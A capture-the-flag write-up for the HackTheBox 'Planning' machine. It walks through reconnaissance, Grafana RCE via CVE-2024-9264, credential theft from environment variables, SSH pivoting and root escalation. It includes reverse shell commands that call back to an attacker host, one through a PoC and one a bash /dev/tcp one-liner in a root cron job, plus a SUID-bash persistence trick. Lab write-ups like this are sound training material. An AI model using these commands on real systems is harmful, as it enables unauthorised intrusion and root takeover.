HackTheBox: Planning
1. Reconnaissance
Initial host enumeration to discover exposed TCP services.
nmap -sC -sV 10.129.44.237
Results:
- Port 22/tcp: OpenSSH 9.6p1
- Port 80/tcp: nginx 1.24.0 (Redirects to
http://planning.htb/)
Standard subdomain fuzzing failed, but utilizing gobuster in vhost mode with the --append-domain flag revealed a hidden endpoint.
gobuster vhost -u http://planning.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 50
Discovery: grafana.planning.htb
2. Initial Access: Grafana Exploitation
Accessing the Grafana dashboard required authentication. The scenario provided starting credentials:
- Username:
admin - Password:
[REDACTED]
After authenticating, we identified the Grafana version and researched public vulnerabilities, leading to CVE-2024-9264 (Grafana SQL Expressions RCE).
Exploitation: Using a public PoC to spawn a reverse shell:
git clone https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit.git
python3 poc.py --url http://grafana.planning.htb/ --username admin --password '[REDACTED]' --reverse-ip <ATTACKER_IP> --reverse-port 9001
Result: Gained shell access inside a Docker container.
3. Container Escape & Lateral Movement
Within the container, executing env revealed environment variables containing administrative credentials for a local user.
# env
...
GF_SECURITY_ADMIN_PASSWORD=[REDACTED]
GF_SECURITY_ADMIN_USER=enzo
...
Leveraging these credentials, we established an SSH session to the host machine:
ssh enzo@planning.htb
Result: Gained host access as enzo. User flag secured ([REDACTED]).
4. Privilege Escalation
Checking sudo -l showed no elevated privileges for enzo. However, exploring /opt revealed a custom crontab database file (/opt/crontabs/crontab.db).
Crontab Analysis:
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P [REDACTED] /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily"}
This disclosed a new password: [REDACTED].
Checking local listening ports:
ss -tulnp
Port 8000/tcp was listening locally. We utilized SSH local port forwarding to access this internal service from our attacker machine.
ssh -L 8888:127.0.0.1:8000 enzo@planning.htb
Navigating to http://127.0.0.1:8888 revealed a task scheduling dashboard. We authenticated using the root user and the password recovered from the crontab database ([REDACTED]).
Executing Malicious Cron Jobs
The dashboard permitted the creation and execution of custom cron jobs running as root. We created a task to execute a reverse shell:
bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1'
Alternatively, a stealthier privilege escalation involves creating a SUID bash binary:
# As enzo
cp /bin/bash /home/enzo/shell
# In the root cronjob:
chown root:root /home/enzo/shell && chmod 4755 /home/enzo/shell
After the cron job executed, running /home/enzo/shell -p granted a persistent root shell.
Result: root shell obtained. The root flag is located at /root/root.txt ([REDACTED]).